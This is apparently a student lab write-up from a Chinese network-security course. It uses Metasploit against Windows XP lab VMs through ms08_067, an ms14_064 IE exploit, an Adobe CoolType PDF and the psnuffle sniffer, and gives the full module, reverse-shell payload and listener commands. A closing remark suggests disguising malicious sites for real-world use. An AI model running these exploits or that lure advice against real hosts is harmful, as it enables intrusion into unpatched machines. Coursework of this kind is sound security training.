2017-2018-2 20155315《网络对抗技术》Exp5 :MSF基础应用

实验目的

学会用metasploit进行简单的攻击操作
教程

实验内容

metasploit中有六个模块分别是

渗透攻击模块(Exploit Modules)
辅助模块(Auxiliary Modules
攻击载荷(Payload Modules)
空字段模块(Nop Modules)
编码模块(Encoders)
后渗透攻击模块(Post)
  • 本次实验使用的是exploitauxiliary
  • exploit:渗透攻击模块,指利用某种漏洞对目标主机进行攻击。渗透就是说攻击者通过目标主机上的一个漏洞将自己的恶意代码注入目标主机的系统,就像白蚁一样,从一个洞慢慢攻破整栋建筑。
  • auxiliary:辅助模块,能够帮助渗透测试者在进行渗透攻击之前得到目标系统丰富的情报信息,从而发起更具目标性的精准攻击。它和exploit之间的关系就好像观察者和狙击手的关系,前者负责观察网络环境,得到准确的信息;后者就根据收集到的信息进行攻击。

实验步骤

(一)一个主动攻击实践,如ms08_067

MS08_67漏洞攻击主要主要原理是攻击者利用受害者主机默认开放的SMB服务端口445,发送恶意资料到这个端口,通过MSRPC接口调用server服务的一个函数,并破坏程序的栈缓存区,获得远程代码执行权限,从而完全控制主机。

  • 实验环境

    计算机 系统 IP地址
    主机 kali 192.168.19.130
    靶机 Windows XP SP3 English(AlwaysOn NX) 192.168.19.132
  • 打开msfconsole设置载荷、参数,运行
    use exploit/windows/smb/ms08_067_netapi
    set payload generic/shell_reverse_tcp
    set RHOST 192.168.19.132              //靶机的IP地址
    set LHOST 192.168.19.130              //本机的IP地址
    set LPORT 5315
    exploit
  • 一开始使用的是target 10,查看教程之后决定设置set target 0让kali自动识别靶机的系统,这样攻击的成功率更大。
  • 结果
  • 让我们看看恶意资料伪装成什么程序。
  • 重新设置载荷为set payload windows/meterpreter/reverse_tcp,exploit后使用getpid得到我们伪装的进程的进程号
  • 使用ps -ef | grep 1064查看进程
  • 通过上次实验的分析知道Svchost.exe 是从动态链接库 (DLL) 中运行的服务的通用主机进程名称,这个程序对系统的正常运行是非常重要,而且是不能被结束的。也就是说我们的攻击被隐藏在系统程序下,想想还是很可怕的。

(二)一个针对浏览器的攻击,如ms14_064

  • 实验环境

    • Internet Exploer 8
    计算机 系统 IP地址
    主机 kali 192.168.19.130
    靶机 Windows XP SP3 192.168.19.131
  • 一开始使用教程中提到的ms11_050进行攻击的时候总是被数据执行保护程序杀死进程,努力将IE浏览器的的安全级别降到最低也无济于事,连续试了03_020ms12_037ms13_009也不成功
  • 重新查找关于IE的exploit,从时间和等级上进行筛选,最后选择windows/browser/ms14_064_ole_code_execution

    Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本

  • 看起来这个漏洞对于win xp应该是一击即中的。
  • use windows/browser/ms14_064_ole_code_execution看看需要设置的参数
  • 设置载荷、参数,运行
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.19.130
    set LPORT 2015
    set URIPATH zyl_
  • 结果
  • 靶机打开IE浏览器输入生成的网址,kali的8080端口监听获得连接,建立会话
  • 打开会话

(三)一个针对客户端的攻击,如Adobe

  • 实验环境

    • Adobe Reader 9.3
    计算机 系统 IP地址
    主机 kali 192.168.19.130
    靶机 Windows XP SP3 192.168.19.131
  • 本次实验采用的漏洞是exploit/windows/browser/adobe_cooltype_sing

    这个漏洞针对Adobe阅读器9.3.4之前的版本,一个名为SING表对象中一个名为uniqueName的参数造成缓冲区溢出

  • 设置载荷、参数,运行
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.19.130
    set LPORT 5315
    set FILENAME 20155315
    exploit

  • 结果
  • 打开监听模块

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.19.130
    set LPORT 1111
  • 将生成的恶意文件复制到靶机,运行之后kali显示回连成功

(四)应用辅助模块的攻击

  • 实验环境

    计算机 系统 IP地址
    主机 kali 192.168.19.130
    靶机 Windows XP SP3 192.168.19.131
  • 进入/usr/share/metasploit-framework/modules/auxiliary目录查看有什么项目
  • 这里面我们看到一个感兴趣的sniffer,也就是网络嗅探器。
  • 进入目录发现只有一个psnuffle.rb

    psnuffle是metasploit中的口令嗅探工具,只有在接入对方网络的初始访问点后才能进行嗅探。

  • msfconsoleuse auxiliary/sniffer/psnuffle,查看详细信息
  • 可以看到它嗅探的是任意协议,捕获的长度是65535,时间限制是500s
  • run在靶机打开百度,kali捕捉到了这次会话

实验中遇到的问题

  • 在做第一个实验的时候出现
    怀疑是靶机的445端口没有打开,根据网上的教程设置之后打开cmd查看445端口重新进行exploit,连接成功
  • 做第二个实验的时候,靶机打开网页总是受到执行数据保护机制的阻挠。
  • 就实验过程来看,对于比较旧的漏洞,IE浏览器或者说数据执行保护都能识别,但是更新的漏洞如果没有下载补丁,靶机的端口就相当于窗户拉开的一条缝,只要恶意网站被打开,攻击者就可以毫不费力地入侵靶机了。

实验问题回答

  • 用自己的话解释什么是exploit,payload,encode.

    • exploit就是通过一个小小的漏洞将自己的恶意代码植入目标主机从而达到攻击的目的,指的是一种攻击的手段
    • payload就相当于是一段恶意代码,或者说是一个装有恶意代码的容器,通过载荷就可以控制目标主机
    • encode是编码器,就是通过编码将恶意代码进行封装或伪装,使其不被目标主机检测为恶意软件

离实战还缺些什么技术或步骤

  • 要真正开始实战的前提是要有足够准确的信息,也就是前期的信息搜集要更全面、更彻底
  • 就本次实验而言,大多都是靶机进行操作来触发恶意代码使攻击方入侵成功的。在实际生活中,对可疑文件、可疑网址等都不会主动点击,因此,如果要进行实战最好是将恶意网站进行再次编辑或者修改域名之类的来提高成功的可能性。

实验总结

本次实验做下来还是比较顺利的,攻击成功的时候感觉自己酷酷的,但是离实战还有一定距离。另外,每做一个实验就又深深地觉得网络真是太不安全了,厉害的人这么多,还是要好好保护电脑!

参考资料

原文地址:https://www.cnblogs.com/-zyl/p/8965030.html

时间: 2024-08-30 03:14:48

2017-2018-2 20155315《网络对抗技术》Exp5 :MSF基础应用的相关文章

2018-2019~6 20165107 网络对抗技术 Exp5 MSF基础应用

20165107 网络对抗技术 Exp5 MSF基础应用 1.实验内容 1.1一个主动攻击实践,如ms08_067(成功) 1.2 一个针对浏览器的攻击,如ms11_050(成功) 1.3 一个针对客户端的攻击,如Adobe(成功) 1.4 成功应用任何一个辅助模块,如scanner/rdp/ms12_020_check(唯一,成功) 2.基础问题回答:用自己的话解释什么是exploit,payload,encode. exploit相当于是载具,是渗透攻击模块,将负责攻击的代码传送到靶机中.

20155232《网络对抗》Exp5 MSF基础应用

20155232<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是利用可能存在的漏洞对目标进行攻击,相当于一个载具 payload:就是攻击的代码,是载荷. encode:为了帮助攻击载荷避免被杀软发现,进行伪装. 实践总结与体会 在辅助模块这里,可以发现很多旧版本的软件有漏洞,从而可以进行相关的攻击,在此次实验中就体验了旧版本有漏洞的一些软件进行了攻击并且很轻易就实现了,所以有漏洞时,一定要尽快打补丁,

20145311王亦徐 《网络对抗技术》 MSF基础应用

20145311王亦徐 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,以ms08_067渗透为例 针对浏览器的攻击,以漏洞10_046为例 针对客户端的攻击,对具体应用的攻击,以对Adobe阅读器的漏洞攻击为例 最后是一个auxiliary模块的例子的应用 基础问题回答 1.解释exploit,payload,encode是什么 exploit是渗透攻击模块,利用系统服务应用中的漏洞

20145321 《网络对抗技术》 MSF基础应用

20145321 <网络对抗技术> MSF基础应用 MS08_067漏洞渗透攻击 先查看kali和windows的IP地址 进入msfconsole,选择使用ms08_067的exploit,再选择具体要负载使用的payload,设置载荷,主机ip,靶机ip 输入exploit命令即可攻击客户端.获取shell.可查看靶机IP

《网络对抗》Exp5 MSF基础应用

20155336<网络对抗>Exp5 MSF基础应用 一.基础知识回答 用自己的话解释什么是exploit,payload,encode exploit:漏洞利用,与靶机进行交互,攻击靶机的最后一步 payload:有效载荷,后面一般加要对靶机进行攻击的代码,可以实现任何运行在受害者环境中的程序所能做的事情 encode:编码器,对代码进行异或运算.去除坏字符等等,保护payload不被发现 二.实践过程 1.Windows服务渗透攻击--MS08-067安全漏洞 ①攻击机:kali ②靶机:

20155330 《网络对抗》 Exp5 MSF基础应用

20155330 <网络对抗> Exp5 MSF基础应用 实践过程记录 Windows服务渗透:MS08_067漏洞攻击 攻击机:kali IP地址:192.168.124.132 靶机:windows XP SP3 简体中文 IP地址:192.168.124.135 输入命令use exploit/windows/smb/ms08_067_netapi 设置参数 set payload generic/shell_reverse_tcptcp反向回连 set LHOST 192.168.23

20155333 《网络对抗》 Exp5 MSF基础应用

20155333 <网络对抗> Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:攻击手段,是能使攻击武器(payload)的方法: payload:攻击武器,真正具有攻击性的代码: encode:编码方式,根据payload将要被放置的环境选择合适的编码方式,使它能够正常的运行. 实践 一个主动攻击实践,如ms08_067 ①攻击机:kali ②靶机:windows XP SP3(English) 在攻击机kali输入m

20155331《网络对抗》Exp5 MSF基础应用

20155331<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode 答:exploit就是漏洞利用.exploit就是利用一切可以利用的工具.采用一切可以采用的方法.找到一切可以找到的漏洞,并且通过对漏洞资料的分析研究,从而达到获取网站用户资料文档.添加自定义用户.甚至侵入网站获得管理员权限控制整个网站的最终目的. payload是攻击载荷,exploit把它传送到靶机中后,它就负责执行相应的攻击代码. encode是编码,实现

20145235李涛《网络对抗》Exp5 MSF基础应用

基础问答 用自己的话解释什么是exploit,payload,encode? exploit:相当于搬运工,把攻击代码传送到靶机中. payload:相当于shellcode. encode:相当于包装者,对攻击代码进行编码. adobe_toolbutton漏洞工具 首先生成后门程序 传到到靶机 设置监听,在靶机上打开后门程序,发现攻击成功,查看靶机的信息 ms08_067漏洞攻击 这个攻击需要设置攻击机和靶机的ip地址,然后直接开始攻击 攻击成功,可以查看到靶机的系统信息 ms10_046漏

20155326刘美岑《网络对抗》Exp5 MSF基础应用

基础问题回答 解释exploit,payload,encode是什么: exploit:就是一个简单的攻击指令,在配置完成之后下发攻击命令. payload:是攻击载荷,是我们在攻击过程中真正用到的部分,进行攻击的实体. encode:是重新进行编码,伪装此次攻击,躲过查杀. 实验过程记录 主动攻击实践:ms06_040 首先,在实验前,检查两个虚拟机能否互相ping通 在kali中打开msf 我首先尝试使用ms06_040进行主动攻击 之后,用show targets查看该漏洞可以攻击的系统版